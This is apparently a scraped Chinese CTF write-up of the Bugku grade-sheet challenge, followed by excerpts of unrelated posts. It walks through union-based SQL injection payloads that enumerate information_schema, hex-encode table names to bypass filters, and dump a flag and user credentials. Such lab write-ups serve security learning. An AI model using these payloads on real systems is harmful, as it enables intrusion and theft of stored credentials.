bugku 成績單詳解
首先開啟查詢成績的頁面
當你這樣去試了之後,就會發現當輸入id=1,2,3,的時候分別有三個孩子的成績,但是當id=4的時候,成績單裡面的成績又為空了。
因此我們可以猜測資料庫裡面一共是有四列的
然後在此處利用內建函式database()爆破獲取資料庫的名字。
此處可以看出資料庫的名字叫做skctf_flag
這裡記一點零碎的知識:
mysql中的information_schema 結構用來儲存資料庫系統資訊
用該語句得到當前庫的所有表
select group_concat(table_name) from information_schema.tables where table_schema=database()
得到表中的欄位名 將敏感的表進行16進製制編碼
現在我們去爆破表名
得到表名fl4g,sc,可知我們需要的資料在fl4g這個表裡
將fl4g轉換為十六進製制(使用十六進製制繞過敏感詞)
得到表中的欄位名 將敏感的表進行16進製制編碼
得到字段具體的值
select group_concat(username,0x3a,password) from adminuser
在此處我們構造union select 1,2,3,skctf_flag from fl4g#
即
爆破出bugku
完成。在 hactf的部落格中看到的,這裡引用一下,可以方便記憶,但是更具體的應該是需要系統的學習資料庫的只是cia能夠掌握了,這也是自己下乙個階段的目標。
1.判斷是否存在注入,注入是字元型還是數字型
抓包更改引數id為
1′ or 1=1 #
2.猜解sql查詢語句中的字段數
1 order by 2 #
1 order by 3 #
3.確定顯示的字段順序
1 union select 1,2 #
4.獲取當前資料庫
1 union select 1,database() #
5.獲取資料庫中的表
1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
6.獲取表中的欄位名
1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0×7573657273 #
1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
Bugku 成績單 有感
題目位址 因為個人是個小白,看到題目毫無頭緒。在網上搜到wp,參考著得以理解。這個題目需要手動爆破資料庫的 庫名 表名 列名 內容。庫名 用資料庫聯合查詢語句 id 1 union select 1,2,3,database 得到資料庫名字skctf flag 表名 id 1 union selec...
BUGKU 本地包含 成績單)
在網頁中新建標籤頁開啟鏈結後出現以下一些php 下面解析這段 r eq uest 這個變數 和 request這個變數和 r eque st這個 變數和 get post一樣,都屬於超級全域性變數,執行時修改後者不會影響前者,修改後者不會影響前者。在這裡可以以get post cookies等方式把...
成績單型別
cjd 雙單引號是注釋 成績單學號 d20c055 s s是字串輸出 你的成績如下 高等數學 f分 f是浮點數輸出,f前加數字幾就保留幾位 python程式設計基礎 f分 形勢與政策 f分 大學英語 f分 xuehao input 請輸入數字 sc float input 請輸入高等數學分數 py ...